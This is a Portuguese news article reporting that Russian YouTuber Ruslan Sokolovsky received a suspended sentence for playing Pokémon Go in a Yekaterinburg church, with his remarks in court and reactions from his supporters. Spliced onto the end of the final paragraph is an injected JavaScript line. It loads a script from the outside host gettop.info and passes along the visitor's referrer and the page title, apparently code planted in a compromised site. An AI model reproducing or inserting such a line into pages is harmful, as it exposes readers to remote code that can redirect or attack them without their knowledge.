Youtuber que caçou Pokémon em igreja russa é condenado

O russo gravou vídeo jogando ‘Pokémon go’ em igreja no seu país (Foto: Reprodução/YouTube/Sokolovsky!)

 

O tribunal de Iekaterinburgo (1,7 mil km a leste de Moscou) condenou o youtuber russo Ruslan Sokolôvski a 3,5 anos de prisão condicional por caçar Pokémon numa igreja. O blogueiro foi declarado culpado por instigar o ódio aos fiéis. Ruslan foi detido em setembro de 2016 após publicar um vídeo no YouTube com comentários de áudio inseridos posteriormente à gravação.

No vídeo, Sokolôvski passeia caçando Pokémons pela “Igreja do Sangue”, construída no lugar onde o tsar Nicolau II e sua família teriam sido assassinados durante a Revolução Russa. Declarando-se ateu, Ruslan decidiu filmar dentro do estabelecimento após assistir, em um canal de TV federal, à notícia de que jogar Pokémon Go em igrejas poderia render processos criminais por insulto aos sentimentos dos fiéis.

Comunismo – O blogueiro caraterizou o processo como “um novo ataque contra a liberdade de expressão”, não declarou a culpa, negou ser extremista e declarou que seu delito não é “violento de maneira alguma”. “Posso ser um idiota, mas não sou extremista”, declarou o blogueiro ao tribunal. “Há muito tempo, pessoas eram presas em campos e por muito mais tempo, não 3,5 anos, mas décadas, simplesmente por fazer piadas com o comunismo e Stálin”, disse.

O prefeito de Iekateringurgo, Evguêni Roizman, e a Anistia Internacional (AI) têm pedido sua liberdade. Durante os três anos e meio de condicional, o blogueiro não poderá mudar de emprego ou residência sem uma autorização judicial, tampouco sair do país ou participar de manifestações. Após a sentença, Sokolôvski agradeceu à imprensapelo apoio.

“Acho que essa sentença é quase uma absolvição. Estou satisfeito que não estarei na prisão”, declarou Sokolôvski. A lei utilizada para condenar Sokolôvski é a mesma que levou o grupo musical “Pussy Riot” a cumprir dois anos de cadeia, a partir de 2012, depois da polêmica “oração punk” no interior de uma catedral de Moscou.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe um comentário